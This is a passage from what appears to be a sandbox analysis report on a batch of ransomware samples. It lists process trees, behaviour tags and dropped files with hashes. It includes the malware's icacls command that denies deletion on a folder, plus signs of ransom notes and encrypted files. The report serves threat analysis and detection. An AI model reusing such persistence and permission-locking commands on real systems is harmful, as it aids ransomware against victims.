                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:5736
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
                  HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  PID:5844
                  • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
                    HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
                    4⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • System Location Discovery: System Language Discovery
                    PID:7816
                    • C:\Windows\SysWOW64\icacls.exe
                      icacls "C:\Users\Admin\AppData\Local\2e5a1121-e777-444f-89f1-76f96316f33c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                      5⤵
                      • Modifies file permissions
                      • System Location Discovery: System Language Discovery
                      PID:6644
                    • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
                      "C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe" --Admin IsNotAutoStart IsNotTask
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      PID:6572
                      • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
                        "C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe" --Admin IsNotAutoStart IsNotTask
                        6⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:7616
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Crypmod.gen-44f0b6ee096aeb62aa585a0c37decaae0177eae22c18e40b0e823d9eaf856b78.exe
                  HEUR-Trojan-Ransom.Win32.Crypmod.gen-44f0b6ee096aeb62aa585a0c37decaae0177eae22c18e40b0e823d9eaf856b78.exe
                  3⤵
                  • Drops startup file
                  • Executes dropped EXE
                  • Enumerates connected drives
                  • Drops file in Program Files directory
                  • System Location Discovery: System Language Discovery
                  PID:6092
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c C:\Users\Admin\Desktop\00468\HEUR-T~1.BAT
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:7736
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-6c64967a5a1bc4c23f94bcca28f8432df1691ebd1c82dda5a55af98b28c7473c.exe
                  HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-6c64967a5a1bc4c23f94bcca28f8432df1691ebd1c82dda5a55af98b28c7473c.exe
                  3⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  PID:6044
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-f910502662909f3a1f4565a02d76f5e2b41e3c8f50c87cffba2dc554f18d6fb2.exe
                  HEUR-Trojan-Ransom.Win32.Cryptoff.vho-f910502662909f3a1f4565a02d76f5e2b41e3c8f50c87cffba2dc554f18d6fb2.exe
                  3⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:6016
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Cryptor.gen-bd88d415032eb24091c352fc0732b31116f44a78d9333037bd7608289608d3cd.exe
                  HEUR-Trojan-Ransom.Win32.Cryptor.gen-bd88d415032eb24091c352fc0732b31116f44a78d9333037bd7608289608d3cd.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:6004
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Encoder.gen-10b47927e604f0f0f8ac54c0ed2afcdfb6a25e47b4305a1f66d9e74e65d59f11.exe
                  HEUR-Trojan-Ransom.Win32.Encoder.gen-10b47927e604f0f0f8ac54c0ed2afcdfb6a25e47b4305a1f66d9e74e65d59f11.exe
                  3⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:5984
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\System32\mshta.exe" vbscript:msgbox("升级前请确认已经重启过电脑,辅助也已经退出,如遇升级失败,请重启电脑后再操作一次 @A神优化 简单好用",64,"A神优化")(window.close)
                    (message box text, translated from Chinese: "Before upgrading, please confirm that the computer has been restarted and the helper has been closed; if the upgrade fails, restart the computer and try again. @A神优化 simple and easy to use", title "A神优化")
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:8096
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Encoder.gen-90aef1f9699429468854159767b2278891c931d9ceb3566b80d20d1b36678ccf.exe
                  HEUR-Trojan-Ransom.Win32.Encoder.gen-90aef1f9699429468854159767b2278891c931d9ceb3566b80d20d1b36678ccf.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2272
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-dd5069aae36220f626dfebd4656d40543b978c6f6ec6910004f5115f0121a4c3.exe
                  HEUR-Trojan-Ransom.Win32.GandCrypt.pef-dd5069aae36220f626dfebd4656d40543b978c6f6ec6910004f5115f0121a4c3.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:5016
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 396
                    4⤵
                    • Program crash
                    PID:6452
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Generic-13b27fe50d1a3dfaccc45fc80c4eaa4e1ec4ba16486266be1470b35d85ccd905.exe
                  HEUR-Trojan-Ransom.Win32.Generic-13b27fe50d1a3dfaccc45fc80c4eaa4e1ec4ba16486266be1470b35d85ccd905.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of SetWindowsHookEx
                  PID:8156
            • C:\Windows\system32\taskmgr.exe
              "C:\Windows\system32\taskmgr.exe" /4
              1⤵
              • Checks SCSI registry key(s)
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:1344
              • C:\Windows\system32\taskmgr.exe
                "C:\Windows\system32\taskmgr.exe" /1
                2⤵
                • Drops startup file
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:3956
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5016 -ip 5016
              1⤵
              PID:8084
            • C:\Windows\system32\werfault.exe
              werfault.exe /h /shared Global\0c0eb7f1c6274d159d14142884003170 /t 3988 /p 3508
              1⤵
              PID:5256
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
              PID:6920
            • C:\Windows\system32\wbengine.exe
              "C:\Windows\system32\wbengine.exe"
              1⤵
              PID:6516
            • C:\Windows\System32\vdsldr.exe
              C:\Windows\System32\vdsldr.exe -Embedding
              1⤵
              PID:7444
            • C:\Windows\System32\vds.exe
              C:\Windows\System32\vds.exe
              1⤵
              • Checks SCSI registry key(s)
              PID:8044
            • C:\Windows\system32\werfault.exe
              werfault.exe /h /shared Global\68dcb19b35bc419aa77d29a2e89b46f4 /t 3988 /p 3508
              1⤵
              PID:5232
            • C:\Windows\SysWOW64\werfault.exe
              werfault.exe /h /shared Global\1ae9b430f78942068775340e908062a4 /t 8160 /p 8156
              1⤵
              PID:6096
            • C:\Windows\system32\OpenWith.exe
              C:\Windows\system32\OpenWith.exe -Embedding
              1⤵
              • Modifies registry class
              • Suspicious use of SetWindowsHookEx
              PID:6272
            • C:\Windows\system32\OpenWith.exe
              C:\Windows\system32\OpenWith.exe -Embedding
              1⤵
              • Modifies registry class
              • Suspicious use of SetWindowsHookEx
              PID:6392
            • C:\Windows\system32\NOTEPAD.EXE
              "C:\Windows\system32\NOTEPAD.EXE" C:\SystemID\PersonalID.txt
              1⤵
              • Opens file in notepad (likely ransom note)
              PID:2052

                          Network

                          MITRE ATT&CK Enterprise v15

                          Downloads

                          • C:\Program Files\7-Zip\7-zip.chm.exe

                            Filesize

                            1.8MB

                            MD5

                            275af12209cd2c28381a8a3d8ce99f5b

                            SHA1

                            a47160c198d69f54e953993821f7a4edd80b8133

                            SHA256

                            0352c6e9fa28240acf7333b4f738b7da4554587bbc7cd6778bf84b75258aeddf

                            SHA512

                            d50019ace490481b38b99b2dc8d19c932b4e6c196ec2c8fd872f13eb8cd7f57193f5cb46a43ba28e55c0eefaaa9fae999fcdf3cbe97837d6de16f4e4f5899052

                          • C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\ReadMe.txt

                            Filesize

                            2KB

                            MD5

                            d0fb4838a9b950e6311e0fd7d18c138c

                            SHA1

                            1f96f64bd12434d6216040a20d6631f9d9d35c7b

                            SHA256

                            87de37c3692d3b960ab8f73c7ecd12d7894cb2042ba5741ffbcf8e769f284d63

                            SHA512

                            d853cba6e1dcab9a36f61f1f495128c6e739637d6ec478fe4d0d2d8ab7fb8601131ffcd30538b5943ce3ef932e574394b3c899c6ecff7a19f97d1c27d0eee488

                          • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                            Filesize

                            64KB

                            MD5

                            d2fb266b97caff2086bf0fa74eddb6b2

                            SHA1

                            2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                            SHA256

                            b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                            SHA512

                            c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                          • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                            Filesize

                            4B

                            MD5

                            f49655f856acb8884cc0ace29216f511

                            SHA1

                            cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                            SHA256

                            7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                            SHA512

                            599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                          • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                            Filesize

                            944B

                            MD5

                            6bd369f7c74a28194c991ed1404da30f

                            SHA1

                            0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

                            SHA256

                            878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

                            SHA512

                            8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                            Filesize

                            53KB

                            MD5

                            a26df49623eff12a70a93f649776dab7

                            SHA1

                            efb53bd0df3ac34bd119adf8788127ad57e53803

                            SHA256

                            4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                            SHA512

                            e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\MSVCP140.dll

                            Filesize

                            439KB

                            MD5

                            5ff1fca37c466d6723ec67be93b51442

                            SHA1

                            34cc4e158092083b13d67d6d2bc9e57b798a303b

                            SHA256

                            5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062

                            SHA512

                            4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\PIL\_imaging.cp39-win32.pyd

                            Filesize

                            2.5MB

                            MD5

                            78d94f3724c28ebb7c393342b5355f2e

                            SHA1

                            6e57576b09cf2688e804f684c8d10b55cff52bf9

                            SHA256

                            cf72bcff475a8855a0b3d10535fa6a4049fcb650e8f6e839f6ad614dce570c6a

                            SHA512

                            0c221fb0136fba654ccb65463fe0b526e33c5a386c0ce6202c922a745c285490a7164a861186a9e0c3c0b3a21654ce79cb21a8c3716489758feb6b0122e27f43

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\VCRUNTIME140.dll

                            Filesize

                            81KB

                            MD5

                            55c8e69dab59e56951d31350d7a94011

                            SHA1

                            b6af2d245ae4d67c38eb1cd31e0c1cffb29b9b2c

                            SHA256

                            9d8d21022ff9d3f6b81a45209662a4f3481edc2befae0c73b83cf942eab8be25

                            SHA512

                            efb2ac1891724df16268480628eb230b6ee37ed47b56d2e02a260559865cdd48ee340ce445e58f625e0f4d6dbdc5bfb7ce2eeedf564b837cff255ef7d1dc58cd

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\_bz2.pyd

                            Filesize

                            75KB

                            MD5

                            387725bc6de235719ae355dfaa81e67c

                            SHA1

                            428b74b0bf8acd04eb20dc5a016352042c812c7a

                            SHA256

                            a9de8848c95518434cb5c2a9cb9d648cba140021e49f2e5212becf13a329b5d0

                            SHA512

                            bed2d6902f2ddd7dc7c2043c210ce682df75616ca63d163b756559dc7d33e926733f96d5407dc856061fba711ce41de9b01bb7b9db3940fa359c32c40d9f8233

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\_ctypes.pyd

                            Filesize

                            112KB

                            MD5

                            aff88d04f5d45e739902084fce6da88a

                            SHA1

                            6ce6a89611069deaa7c74fa4fa86882dc21b5801

                            SHA256

                            34371eb9b24ba67ce6803d965cf5f0fe88ef4762af648ec2183e5bf21835d876

                            SHA512

                            8dd8f90ae1cc0fbc76f0039bc12e1aee7b2718017f4f9b09361001bed7b278b84f20d0fffceda4d5edd8744140cfdf1ca52497645d0480f5d42934f7df9808ba

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\_hashlib.pyd

                            Filesize

                            50KB

                            MD5

                            fdfa235f58a04d19e1ce923ca0d8ae19

                            SHA1

                            4a1178ba7e9a56f8c68dc3391a169222c67237e9

                            SHA256

                            7ad484e99ea33e4eea2cbf09203fb9dbd0c2c325b96e6cf2ffd146156c93bf7a

                            SHA512

                            0fe187e1019c159c0ee90fbc8eea20e40a28ff05223321d04784e577b60a2c0a3a476fabc71bd81dd08e7a127bb6cb03edf5d604bfdda38516fb2c90148dd118

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\_lzma.pyd

                            Filesize

                            157KB

                            MD5

                            f6b74ac19fb0601a4e612a8dc0c916e3

                            SHA1

                            d4a77386caf7f70e66d5ec4543c8d9de0e4bc39f

                            SHA256

                            ce2ea2c96afd8c0cf97fc55130f835b6625a0772d86b259ea82bbc0b3def75e6

                            SHA512

                            0b60c51f76eb6872000d92bbec7fdabf687f5096fd12f1456cf26ad6033c22b998aee94842fda800288bef94790608204f97a7ed034544a1377cbf9722c6a826

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\_socket.pyd

                            Filesize

                            68KB

                            MD5

                            a9450642d8832893998bd213d98d509b

                            SHA1

                            3ef416ffaa438a2809cdffddd1b2717461ead7d4

                            SHA256

                            5407750d69d74318ec66bd1464558c07c06c6aa9edbc0641cd2dd7533378772b

                            SHA512

                            93027a694800d2d92ba773e8232ee016946ee9b36ba211537619df0508e9f50660b9a292d29dd4e90c2406b29bd3b1f8e4eb2226945b7163b2bd3227d4482323

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\_tkinter.pyd

                            Filesize

                            58KB

                            MD5

                            a475634789bb1284d75e55870462a74a

                            SHA1

                            af7bfe3ffeef7479549831c5cd0de487151a6c5f

                            SHA256

                            725a13950969db01ad20af1f36eb28d6011a2feb31bd8c112b6bed2d025bc761

                            SHA512

                            9ca2f331d9ca22732ab0cf12a42d1b221f5daf01b5a83c43a4ba0b48798289d52428ab17cdedfde9eb2daf5f12304fe28e2c4d2306399b7fa562acdc74487a19

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\base_library.zip

                            Filesize

                            758KB

                            MD5

                            67d863a39e90cd2fa3c20f4b06ce8397

                            SHA1

                            98a2e831f22a29d72850d1e7a3de863892dadf5f

                            SHA256

                            02cb3daf59557ea5b992663a29eee8e9ac3241f55d3f34a3fc829be19a381b1b

                            SHA512

                            ac0536c7138325ff311fb6b7dcaaea0629c3535666b42097232a80046bbc8790b0d84e1b4164f7a4f675e47cd5fd4a28d0053714f44a3452297f05f30109fd3d

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\libcrypto-1_1.dll

                            Filesize

                            2.1MB

                            MD5

                            aad424a6a0ae6d6e7d4c50a1d96a17fc

                            SHA1

                            4336017ae32a48315afe1b10ff14d6159c7923bc

                            SHA256

                            3a2dba6098e77e36a9d20c647349a478cb0149020f909665d209f548dfa71377

                            SHA512

                            aa4b74b7971cb774e4ae847a226cae9d125fadc7cde4f997b7564dff4d71b590dcbc06a7103451b72b2afe3517ab46d3be099c3620c3d591ccbd1839f0e8f94a

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\libffi-7.dll

                            Filesize

                            28KB

                            MD5

                            bc20614744ebf4c2b8acd28d1fe54174

                            SHA1

                            665c0acc404e13a69800fae94efd69a41bdda901

                            SHA256

                            0c7ec6de19c246a23756b8550e6178ac2394b1093e96d0f43789124149486f57

                            SHA512

                            0c473e7070c72d85ae098d208b8d128b50574abebba874dda2a7408aea2aabc6c4b9018801416670af91548c471b7dd5a709a7b17e3358b053c37433665d3f6b

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\pyexpat.pyd

                            Filesize

                            164KB

                            MD5

                            3e43bcc2897f193512990e9e9024111b

                            SHA1

                            11dec8c9a1c4b45de9c980125eaef462038c1f2a

                            SHA256

                            0d8ac2a2b81176a06b0fb8663702428d2cdd5bedeab68b04210bf5cb6b49a475

                            SHA512

                            e629f23a9ad1274b57a47b170e598e47f28984dc2aaf4985ded9b217f4288222190eabe5a9fd4b11fa3eadb42040d8a532090544bf46be288b7310966d126aac

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\python39.dll

                            Filesize

                            4.2MB

                            MD5

                            2a9c5db70c6906571f2ca3a07521baa2

                            SHA1

                            765fa27bbee6a02b20b14b2b78c92a880e6627e5

                            SHA256

                            c69ce89b0487d86a63b64951207781f8051282afde67b20d3b8374c1a067f611

                            SHA512

                            fa4a677eaae2d258ac4f083a4e7009d985523b964ada93f53dc399a88c14970c7be2d2f39a7b38a922b58d134df2ede954554dcd00a4895e4273161867acac53

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\select.pyd

                            Filesize

                            23KB

                            MD5

                            1559cf3605d62c03d6ff2440ea3e175f

                            SHA1

                            26faec2bafd8523d1705021d06c56947b58cda1c

                            SHA256

                            b8da64fa424e5fb2bc8de93d2c0dcb55076cd9345452d3c624b3fcbbbe15644b

                            SHA512

                            1891a356ae98a09a7476697b6e7dd0de6b940043910a9aa414e17a523118d76dd0c55ea786d9bd2a77d792bdf95a75b272352eb813d928c429a707a78c09f05c

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\tcl86t.dll

                            Filesize

                            1.3MB

                            MD5

                            30195aa599dd12ac2567de0815ade5e6

                            SHA1

                            aa2597d43c64554156ae7cdb362c284ec19668a7

                            SHA256

                            e79443e9413ba9a4442ca7db8ee91a920e61ac2fb55be10a6ab9a9c81f646dbb

                            SHA512

                            2373b31d15b39ba950c5dea4505c3eaa2952363d3a9bd7ae84e5ea38245320be8f862dba9e9ad32f6b5a1436b353b3fb07e684b7695724a01b30f5ac7ba56e99

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\tk86t.dll

                            Filesize

                            1.1MB

                            MD5

                            6cadec733f5be72697d7112860a0905b

                            SHA1

                            6a6beeef3b1bb7c85c63f4a3410e673fce73f50d

                            SHA256

                            19f70dc79994e46d3e1ef6be352f5933866de5736d761faa8839204136916b3f

                            SHA512

                            e6b3e52968c79d4bd700652c1f2ebd0366b492fcda4e05fc8b198791d1169b20f89b85ec69cefa7e099d06a78bf77ff9c3274905667f0c94071f47bafad46d79

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sf1qyg12.vpd.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • C:\Users\Admin\AppData\Local\Temp\zbhnd.exe

                            Filesize

                            50KB

                            MD5

                            a4e326edfb5c14337c348ea156e08cef

                            SHA1

                            8d798dda9fc662a5904003946c7d926c7ea7c221

                            SHA256

                            8c2cc065a557828ba632feaa1e6165b1a7e434291d4a48ebb513dbc7b27b8f20

                            SHA512

                            837431acbb9891a0bb2d6b7500c2404929a6c7a7218b42fde4762e50fc41b8dbe50028e4b857ac2812a3ed87f8141427358445c919c7d82c1e053bbb85d3884e

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Background Tasks Profiles\fb9jlpni.MozillaBackgroundTask-308046B0AF4A39CB-defaultagent\ReadMe.txt.CRYPTEDPAY

                            Filesize

                            3KB

                            MD5

                            9bbad889e2383a2fd803c557dd8eb378

                            SHA1

                            0dac20cbfbe806a3edf6129ab740ca660db4ff12

                            SHA256

                            b71fb6ed4dcf0a48ea3e4775eee2beedd1ec90762b5d5fd71f554d65af79c2fa

                            SHA512

                            5136dd0c2f7185af9a38d6af92df5ab1bbb5e72dee0dbff777168472b111f66a60d2393a9637792b3c241f9273217a32815455855bc2e6c80824e6b199ec0e81

                          • C:\Users\Admin\Contacts\ReadMe.txt

                            Filesize

                            3KB

                            MD5

                            20ed6ca26678eeb6a845c175c149951b

                            SHA1

                            296e7b147eac56c966903df1e6e76a4351870130

                            SHA256

                            7c67ce4e7bc83101d62adc2a6a445e805548873c613e1fa75e387b0249233fcd

                            SHA512

                            0715fdc9293d16c8b8449e93eca7391491b3d8eca3e285fb87b0e15439529db9da42952f3dbc0e0aa2c04af084b6d3dc9ca1faa4cc186a811eea1aaa0f5d10c3

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Agent.gen-1ba5ab55b7212ba92a9402677e30e45f12d98a98f78cdcf5864a67d6c264d053.exe

                            Filesize

                            610KB

                            MD5

                            deb8f4311fd52319f6168c10b626c808

                            SHA1

                            f4807d71a1048d05815a09b74997f338e26ba9ff

                            SHA256

                            1ba5ab55b7212ba92a9402677e30e45f12d98a98f78cdcf5864a67d6c264d053

                            SHA512

                            ecb2c2630b03a07f20e993722ef9f55f5369d11afa21bec3dab59f65867849fb3596e4d3707730d2d75acd5d62e98afb1c06f2e7a80cd4f5946b51867bed9685

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Agent.gen-b103fc649787eb1f6121df8174d0f16aaac736fb53f5f078d312871189285956.exe

                            Filesize

                            61KB

                            MD5

                            9eb958c38bd3d39c55b009f9a200f42f

                            SHA1

                            b5ab794dd5821d08f7ecd860ba7975a6644dd46d

                            SHA256

                            b103fc649787eb1f6121df8174d0f16aaac736fb53f5f078d312871189285956

                            SHA512

                            f7146fa64c8fe89eb4afb29af0b85e1693a03aeb38ae2948b8c047b4f1dd84817954563b6bd5ead4c4461242e1275c47ef4b41cf33fe9e3899dfe3952bc46954

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a2b24057a5bb69f39216c44bc0400a670790c88d6a6016462e4d07db43722bb8.exe

                            Filesize

                            69KB

                            MD5

                            1e175bf4ba4793a382da7167ddbf074f

                            SHA1

                            c461df9cfc14dc79d0e9485f1fe44fd6253e091a

                            SHA256

                            a2b24057a5bb69f39216c44bc0400a670790c88d6a6016462e4d07db43722bb8

                            SHA512

                            cb468afb985d31506e03cd90d05378dbfbe466651db2e0407918eaccaca19c61294dc68f08d17e9c8cf63d7cd05e1fb6b1fad580a17e2c2899a32174dffec0ed

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a3a1dcd338b4e5078dd0a853fa0b84de141d680ea984cd3d914ebc23fc72756d.exe

                            Filesize

                            183KB

                            MD5

                            e21b3b2da765eac6dd83d89682877b49

                            SHA1

                            3fb51724f9e5b9ef940a9354f83a391e354a1ea6

                            SHA256

                            a3a1dcd338b4e5078dd0a853fa0b84de141d680ea984cd3d914ebc23fc72756d

                            SHA512

                            d88ebefa0cf537ea6ad975e008c5a336699ef484f2b6d44fece02a2c25d98e5bb59d260f2064f67b4e25d256e2b1fe46ed7b73353bb02c67a345e1495f4738e6

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a75a498d8ec7bf58a12c07fac6ad98c5581a422cca03fa3ca87b01677f37247e.exe

                            Filesize

                            589KB

                            MD5

                            5d6d98d0ed873da0eaa560212c32dfd8

                            SHA1

                            e0f055ea9c663d202915b54540d09a4e0daf82a2

                            SHA256

                            a75a498d8ec7bf58a12c07fac6ad98c5581a422cca03fa3ca87b01677f37247e

                            SHA512

                            0b31e99eba600067682fab42e07ef8c836f8ef521acfbe1032f184701c2791a4bb0a94364ce962efd7732fa089142383d11788b82a4f006e43590115a3925cbc

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f.exe

                            Filesize

                            55KB

                            MD5

                            cd22822f28e387ba075f39c23fb024ab

                            SHA1

                            ddb7169a61706d69486dc19fc33f4a217eabc505

                            SHA256

                            c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f

                            SHA512

                            45f6c2d5585f0b6f64f0f7d874f92d70dac2d724932f8c60827ebe5d7a831ac0e3a9d48edf700ac8ca27697f9c4b222ac27ce49ab17f694cad702d7fed4e772e

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d3635e7428a16515d98ec564145b363802dfa54418ac6221a638651732af4e2b.exe

                            Filesize

                            1.7MB

                            MD5

                            3b17aa91d84b96c1712f3106e958db03

                            SHA1

                            7c0d1d97a36fa8604878f98bb55cffc9707171de

                            SHA256

                            d3635e7428a16515d98ec564145b363802dfa54418ac6221a638651732af4e2b

                            SHA512

                            c3c4b8666024005d29be76cef967257632e18aa7cd4fa57ab3170de0ccfbe5978cb687f728e5ecef7392694f182ab430610defb4eaf2d88ef059856232367c96

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe

                            Filesize

                            802KB

                            MD5

                            fb55b405501121708ec66dec20a83953

                            SHA1

                            6d4fbfbaf6ff14d83f835c31a7ea2708cf760e14

                            SHA256

                            f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003

                            SHA512

                            9fdb97a2558246f7f3760f4168db913fd0acc352193f7263d75d31ac422647b24059794b1956fe21d397f477380b686620b3d4411958939fa715b291a02c8bb1

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Gen.gen-ebd09856f75a766a48ff636787d345c64bf61d374c69f8f299643b83a02f7123.exe

                            Filesize

                            12.9MB

                            MD5

                            a4877a3227291745c13b74e05597c355

                            SHA1

                            2091f687ee2dd53113542a4b9438a3dc1b26cd84

                            SHA256

                            ebd09856f75a766a48ff636787d345c64bf61d374c69f8f299643b83a02f7123

                            SHA512

                            af76ea99fa88b4c5bee500808c2803cd282c1d4fc9e5d0164163652aa4f80e3f6b8e654febfd835cdcbbbf7cfc7d7bdd02095f72072740c3820cd140da9be466

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Python.Agent.gen-d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918.exe

                            Filesize

                            21.0MB

                            MD5

                            078265af9fd10064a23cac405a144677

                            SHA1

                            a94acc3a65654dc9583c927b357ce096bf207606

                            SHA256

